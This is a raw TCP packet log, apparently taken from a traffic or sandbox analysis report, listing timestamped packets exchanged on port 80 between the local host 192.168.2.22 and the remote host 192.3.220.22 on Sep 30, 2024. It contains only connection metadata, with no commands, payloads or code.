                                                                            Sep 30, 2024 09:57:01.534571886 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.534586906 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.534599066 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.534651995 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.534663916 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.534673929 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.534684896 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.534689903 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.534698009 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.534703970 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.534708977 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.534718990 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.534719944 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.534732103 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.534734964 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.534743071 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.534754038 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.534754992 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.534761906 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.534781933 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.535154104 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.535165071 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.535181046 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.535190105 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.535192013 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.535202980 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.535207033 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.535214901 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.535223007 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.535234928 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.535254955 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.535263062 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.535267115 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.535271883 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.535278082 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.535315037 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.535370111 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.535381079 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.535403013 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.535407066 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.535412073 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.535414934 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.535425901 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.535435915 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.535438061 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.535448074 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.535450935 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.535459995 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.535464048 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.535495996 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.535499096 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.535509109 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.535515070 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.535525084 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.535530090 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.535540104 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.535547972 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.535552025 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.535562038 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.535563946 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.535573959 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.535588980 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.535604954 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.535970926 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.536000967 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.536006927 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.536046982 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.536050081 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.536063910 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.536077023 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.536082983 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.536086082 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.536097050 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.536098957 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.536113977 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.536124945 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.536127090 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.536139965 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.536149979 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.536159039 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.536163092 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.536175966 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.536185980 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.536251068 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.536262035 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.536272049 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.536282063 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.536288023 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.536292076 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.536305904 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.536305904 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.536310911 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.536317110 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.536333084 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.536348104 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.536355972 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.536360979 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.536371946 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.536375999 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.536375999 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.536382914 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.536397934 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.536398888 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.536417007 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.536431074 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.536815882 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.536827087 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.536838055 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.536853075 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.536869049 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.536880970 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.536891937 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.536901951 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.536911964 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.536915064 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.536931992 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.536945105 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.537033081 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.537043095 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.537053108 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.537064075 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.537075043 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.537085056 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.537090063 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.537096977 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.537113905 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.537116051 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.537116051 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.537125111 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.537136078 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.537136078 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.537136078 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.537147999 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.537152052 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.537158966 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.537164927 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.537169933 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.537178040 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.537199020 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.537201881 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.537209988 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.537220955 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.537230015 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.537230968 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.537241936 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.537242889 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.537257910 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.537271023 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.537655115 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.537666082 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.537677050 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.537692070 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.537713051 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.537719011 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.537733078 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.537750006 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.537758112 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.537761927 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.537781000 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.537806988 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.537870884 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.537882090 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.537889004 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.537899971 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.537905931 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.537913084 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.537918091 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.537925005 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.537930012 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.537940979 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.537947893 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.537959099 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.537959099 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.537974119 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.537974119 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.537985086 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.537991047 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.537996054 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.538007975 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.538007975 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.538018942 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.538026094 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.538031101 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.538038015 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.538048029 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.538059950 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.538060904 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.538067102 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.538072109 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.538079023 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.538089037 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.538110018 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.538502932 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.538513899 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.538526058 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.538544893 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.538556099 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.538572073 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.538583994 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.538594961 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.538604975 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.538606882 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.538624048 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.538635015 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.538712978 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.538723946 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.538733959 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.538746119 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.538747072 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.538757086 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.538764000 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.538768053 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.538777113 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.538779974 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.538789988 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.538791895 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.538803101 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.538803101 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.538815022 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.538830042 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.538867950 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.538880110 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.538889885 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.538899899 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.538903952 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.538911104 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.538918972 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.538922071 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.538932085 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.538932085 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.538943052 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.538948059 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.538953066 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.538959980 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.538964987 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.538974047 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.538985014 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.538995981 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.539320946 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.539330959 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.539341927 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.539355040 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.539367914 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.539381981 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.539391994 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.539402962 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.539413929 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.539427042 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.539427042 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.539439917 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.539453983 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.539509058 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.539520025 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.539530039 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.539541006 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.539542913 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.539551973 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.539556980 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.539563894 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.539572001 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.539573908 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.539586067 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.539587021 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.539597988 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.539597988 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.539643049 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.539648056 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.539659977 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.539670944 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.539680004 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.539680958 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.539690971 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.539694071 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.539705038 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.539705038 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.539716959 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.539716959 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.539730072 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.539733887 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.539741993 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.539747000 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.539756060 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.539757967 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.539774895 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.539786100 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.540147066 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.540158033 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.540169954 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.540185928 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.540199995 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.541012049 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.541023016 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.541034937 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.541054964 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.541066885 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.541769028 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.541780949 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.541793108 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.541807890 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.541820049 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.542587042 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.542598009 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.542608023 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.542629004 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.542644024 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.543596029 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.543606997 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.543617964 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.543631077 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.543642044 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.544169903 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.544182062 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.544193029 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.544203997 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.544205904 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.544219971 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.544231892 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.545125961 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.545140028 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.545150995 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.545162916 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.545166969 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.545181990 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.545193911 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.545356989 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.545404911 CEST4917780192.168.2.22192.3.220.22
